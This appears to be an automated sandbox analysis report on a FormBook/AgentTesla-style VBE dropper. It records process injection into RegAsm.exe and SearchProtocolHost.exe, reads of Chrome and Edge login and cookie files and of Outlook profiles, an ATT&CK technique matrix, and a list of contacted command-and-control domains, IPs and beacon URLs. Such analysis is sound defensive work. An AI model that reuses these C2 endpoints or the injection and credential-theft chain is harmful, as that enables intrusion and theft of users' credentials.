                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread register set: target process: 2884Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread APC queued: target process: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FF4008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe "C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: zfEzkYXCOLr.exe, 00000005.00000000.1497084607.0000000000E10000.00000002.00000001.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000005.00000002.3775786626.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000000.1643427754.00000000011A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: zfEzkYXCOLr.exe, 00000005.00000000.1497084607.0000000000E10000.00000002.00000001.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000005.00000002.3775786626.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000000.1643427754.00000000011A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: zfEzkYXCOLr.exe, 00000005.00000000.1497084607.0000000000E10000.00000002.00000001.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000005.00000002.3775786626.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000000.1643427754.00000000011A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: zfEzkYXCOLr.exe, 00000005.00000000.1497084607.0000000000E10000.00000002.00000001.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000005.00000002.3775786626.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000000.1643427754.00000000011A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3775770307.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3766152449.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3778720033.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3775867961.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3776047810.0000000005420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1575092395.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1575820816.0000000006400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3775770307.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3766152449.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3778720033.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3775867961.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3776047810.0000000005420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1575092395.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1575820816.0000000006400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts2
                Exploitation for Client Execution
                1
                Scripting
                612
                Process Injection
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                41
                Virtualization/Sandbox Evasion
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                612
                Process Injection
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                5
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture5
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Abuse Elevation Control Mechanism
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Timestomp
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559545 Sample: DOC_114542366.vbe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 35 www.duwixushx.xyz 2->35 37 www.amayavp.xyz 2->37 39 16 other IPs or domains 2->39 49 Suricata IDS alerts for network traffic 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected FormBook 2->53 57 3 other signatures 2->57 11 wscript.exe 2 2->11         started        signatures3 55 Performs DNS queries to domains with low reputation 37->55 process4 file5 33 C:\Users\user\AppData\...\temp_u8gpg.exe, PE32 11->33 dropped 71 Benign windows process drops PE files 11->71 73 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->73 75 Suspicious execution chain found 11->75 15 temp_u8gpg.exe 3 11->15         started        signatures6 process7 signatures8 79 Antivirus detection for dropped file 15->79 81 Machine Learning detection for dropped file 15->81 83 Writes to foreign memory regions 15->83 85 2 other signatures 15->85 18 RegAsm.exe 15->18         started        process9 signatures10 47 Maps a DLL or memory area into another process 18->47 21 zfEzkYXCOLr.exe 18->21 injected process11 signatures12 59 Maps a DLL or memory area into another process 21->59 61 Found direct / indirect Syscall (likely to bypass EDR) 21->61 24 SearchProtocolHost.exe 13 21->24         started        process13 signatures14 63 Tries to steal Mail credentials (via file / registry access) 24->63 65 Tries to harvest and steal browser information (history, passwords, etc) 24->65 67 Modifies the context of a thread in another process (thread injection) 24->67 69 3 other signatures 24->69 27 zfEzkYXCOLr.exe 24->27 injected 31 firefox.exe 24->31         started        process15 dnsIp16 41 www.amayavp.xyz 185.27.134.144, 50025, 50026, 80 WILDCARD-ASWildcardUKLimitedGB United Kingdom 27->41 43 www.connecty.live 203.161.43.228, 49997, 49998, 49999 VNPT-AS-VNVNPTCorpVN Malaysia 27->43 45 11 other IPs or domains 27->45 77 Found direct / indirect Syscall (likely to bypass EDR) 27->77 signatures17

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                DOC_114542366.vbe18%ReversingLabsScript-WScript.Trojan.AgentTesla
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.bookingservice.center/4bee/0%Avira URL Cloudsafe
                http://www.guacamask.online/display.cfm0%Avira URL Cloudsafe
                http://www.guacamask.online/__media__/js/trademark.php?d=guacamask.online&type=ns0%Avira URL Cloudsafe
                http://www.guacamask.online/rfhq/?KV=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqkDMLBEiy3WEQe219nV0S5mknFQQ1hIDuAzNxIBCE=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.614genetics.online/px.js?ch=20%Avira URL Cloudsafe
                http://www.614genetics.online/px.js?ch=10%Avira URL Cloudsafe
                http://www.supernutra01.online/jt56/0%Avira URL Cloudsafe
                http://www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.guacamask.online/rfhq/0%Avira URL Cloudsafe
                http://www.connecty.live/q6ws/?KV=2RCZf5GiD+fToLXcMHisxCqwWbc28bp5zmUuGnuHZcsPDzCWfzFSI1Df4pF2LDKbQ3OqnVWPrFqSO4182xFWIWWOBmKrBRiY7XTQRir+3P1LJShw3pPG+Dk=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.yvcp3.info/i7qk/0%Avira URL Cloudsafe
                http://www.rafconstrutora.online/04wl/0%Avira URL Cloudsafe
                http://www.614genetics.online/me88/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/dcdf/0%Avira URL Cloudsafe
                http://www.seeseye.website/37ym/0%Avira URL Cloudsafe
                http://www.614genetics.online/me88/?KV=q4gJP+3oagrN9CKx8rfxsUGQTP5gFdbCqSnsSAovlnmOs/6LoBJM5Gt+ZeI5OsVhXMd6KM7YnqTd6M8YysOllc/dqLONIyR3l/1k9rdJVwtuEJXWvL6OrMc=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.guacamask.online/Guacamask_Online_Booking.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBG0%Avira URL Cloudsafe
                http://www.bookingservice.center/4bee/?KV=OWaLDb1Jm9p4bkDVec29BoDmBVET5eJeilgKnYToBBeYyiPSqC7oM1F3UnEyEVbrshSo8g4GkysDEHe9VbsXh/SWnXsZyYCMcK4IBi4/IwS5Oa2XQ2sC/aw=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.yvcp3.info/i7qk/?KV=y1Deuhcniwy3qxxQAmTyamEbBAp7BzgQf56uDV1XLiTDd60qTBhOzyQcu/peRmYp6AfM2zjHYnfo1VupJPImQ14HHScIWb6hMHv5+s8iUY9NL2Qo8ivIVjo=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.supernutra01.online/jt56/?KV=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wfRdswz4Mf7fkXLX0rdEfHuvF7ynYddkbc+A=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.bcg.services/mxde/?KV=8xKxkpsUUE6O2YGNwLnJ/+WM1qqfoI8NOsOkZIrS/NSsfWu+QjWct9+gZKiyGOAYB5Pljgx8M21MT9QArezJJe5Vce6MQIBegnnKKN1EkLTSu1v+eqsUQ+w=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.Guacamask.online0%Avira URL Cloudsafe
                http://www.guacamask.online/Guacamask_Online_Banking.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBG0%Avira URL Cloudsafe
                http://www.rafconstrutora.online/04wl/?KV=10FWZSQ9WPLVyv9qBMSr5p2LrQDaGm/mNCwAUqa3tlQsFj4tjY5WEjDNTnPsz2N9DzYKtSqEkqZ6JmaP68J/ydW7QnrBD/a7HdnFb2gh9G13RXTqS9Au/Yk=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.guacamask.online/Guacamask_Online_Sa_Prevodom.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2B0%Avira URL Cloudsafe
                http://www.guacamask.online/Guacamask_Online_Store.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuB0%Avira URL Cloudsafe
                http://www.guacamask.online/__media__/design/underconstructionnotice.php?d=guacamask.online0%Avira URL Cloudsafe
                http://www.guacamask.online/Guacamask_Online_Gratis.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGu0%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos/od8t/?KV=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuEty+FSeypv/0YqJ9KzFrGa8mXVJ9lffIJok=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.76kdd.top/idu4/0%Avira URL Cloudsafe
                http://www.614genetics.online/sk-logabpstatus.php?a=WnBLNjkrbVlldHVINmphNWlCc0VwNzM2dk40eEMzS2RMZnFB0%Avira URL Cloudsafe
                http://www.connecty.live/q6ws/0%Avira URL Cloudsafe
                http://www.76kdd.top/idu4/?KV=qD8cAnDgckBLYUQoRh7zBwgp4vAR8SH4vArrPOMmIDAln/sBv7g5z1sASbSU3sLbiWKHdb75VGXih9cbyGRF9rbA94O5jPyz1SB60B/cp/B1u7O6lua4pvo=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos/od8t/0%Avira URL Cloudsafe
                https://www.hostgator.com.br0%Avira URL Cloudsafe
                http://www.duwixushx.xyz/bmve/?Wno=a0qDq&KV=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdT88wJdzRXyyanezdQrBbCEm548OmpMr0744=0%Avira URL Cloudsafe
                http://www.amayavp.xyz0%Avira URL Cloudsafe
                http://www.bcg.services/mxde/0%Avira URL Cloudsafe
                http://www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq0%Avira URL Cloudsafe
                http://www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB0%Avira URL Cloudsafe
                http://www.aiactor.xyz/x4ne/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.guacamask.online
                208.91.197.27
                truetrue
                  unknown
                  www.amayavp.xyz
                  185.27.134.144
                  truetrue
                    unknown
                    www.seeseye.website
                    103.224.182.242
                    truetrue
                      unknown
                      www.supernutra01.online
                      172.67.220.36
                      truetrue
                        unknown
                        www.duwixushx.xyz
                        156.251.17.224
                        truetrue
                          unknown
                          www.connecty.live
                          203.161.43.228
                          truetrue
                            unknown
                            www.rafconstrutora.online
                            172.67.159.24
                            truetrue
                              unknown
                              www.bcg.services
                              199.59.243.227
                              truetrue
                                unknown
                                www.aiactor.xyz
                                13.248.169.48
                                truetrue
                                  unknown
                                  1hong.pels5zqo.shop
                                  43.163.1.110
                                  truetrue
                                    unknown
                                    www.yvcp3.info
                                    47.254.140.255
                                    truetrue
                                      unknown
                                      76kdd.top
                                      38.47.232.194
                                      truetrue
                                        unknown
                                        www.614genetics.online
                                        208.91.197.27
                                        truetrue
                                          unknown
                                          www.bookingservice.center
                                          98.124.224.17
                                          truetrue
                                            unknown
                                            www.1qcczjvh2.autos
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.76kdd.top
                                              unknown
                                              unknownfalse
                                                unknown
                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.guacamask.online/rfhq/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.supernutra01.online/jt56/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.guacamask.online/rfhq/?KV=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqkDMLBEiy3WEQe219nV0S5mknFQQ1hIDuAzNxIBCE=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.bookingservice.center/4bee/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.connecty.live/q6ws/?KV=2RCZf5GiD+fToLXcMHisxCqwWbc28bp5zmUuGnuHZcsPDzCWfzFSI1Df4pF2LDKbQ3OqnVWPrFqSO4182xFWIWWOBmKrBRiY7XTQRir+3P1LJShw3pPG+Dk=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.yvcp3.info/i7qk/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.614genetics.online/me88/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.rafconstrutora.online/04wl/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.amayavp.xyz/dcdf/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.614genetics.online/me88/?KV=q4gJP+3oagrN9CKx8rfxsUGQTP5gFdbCqSnsSAovlnmOs/6LoBJM5Gt+ZeI5OsVhXMd6KM7YnqTd6M8YysOllc/dqLONIyR3l/1k9rdJVwtuEJXWvL6OrMc=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.seeseye.website/37ym/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.bookingservice.center/4bee/?KV=OWaLDb1Jm9p4bkDVec29BoDmBVET5eJeilgKnYToBBeYyiPSqC7oM1F3UnEyEVbrshSo8g4GkysDEHe9VbsXh/SWnXsZyYCMcK4IBi4/IwS5Oa2XQ2sC/aw=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.supernutra01.online/jt56/?KV=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wfRdswz4Mf7fkXLX0rdEfHuvF7ynYddkbc+A=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.yvcp3.info/i7qk/?KV=y1Deuhcniwy3qxxQAmTyamEbBAp7BzgQf56uDV1XLiTDd60qTBhOzyQcu/peRmYp6AfM2zjHYnfo1VupJPImQ14HHScIWb6hMHv5+s8iUY9NL2Qo8ivIVjo=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.bcg.services/mxde/?KV=8xKxkpsUUE6O2YGNwLnJ/+WM1qqfoI8NOsOkZIrS/NSsfWu+QjWct9+gZKiyGOAYB5Pljgx8M21MT9QArezJJe5Vce6MQIBegnnKKN1EkLTSu1v+eqsUQ+w=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.76kdd.top/idu4/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.rafconstrutora.online/04wl/?KV=10FWZSQ9WPLVyv9qBMSr5p2LrQDaGm/mNCwAUqa3tlQsFj4tjY5WEjDNTnPsz2N9DzYKtSqEkqZ6JmaP68J/ydW7QnrBD/a7HdnFb2gh9G13RXTqS9Au/Yk=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.1qcczjvh2.autos/od8t/?KV=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuEty+FSeypv/0YqJ9KzFrGa8mXVJ9lffIJok=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.connecty.live/q6ws/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.76kdd.top/idu4/?KV=qD8cAnDgckBLYUQoRh7zBwgp4vAR8SH4vArrPOMmIDAln/sBv7g5z1sASbSU3sLbiWKHdb75VGXih9cbyGRF9rbA94O5jPyz1SB60B/cp/B1u7O6lua4pvo=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.1qcczjvh2.autos/od8t/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.duwixushx.xyz/bmve/?Wno=a0qDq&KV=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdT88wJdzRXyyanezdQrBbCEm548OmpMr0744=true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDqtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.bcg.services/mxde/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.aiactor.xyz/x4ne/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabSearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    high
                                                    https://dts.gnpge.comzfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/ac/?q=SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://i1.cdn-image.com/__media__/pics/29590/bg1.png)SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          high
                                                          http://www.guacamask.online/display.cfmSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.guacamask.online/__media__/js/trademark.php?d=guacamask.online&type=nsSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://cdn.consentmanager.netSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              high
                                                              http://www.614genetics.online/px.js?ch=2SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000535C000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000040FC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
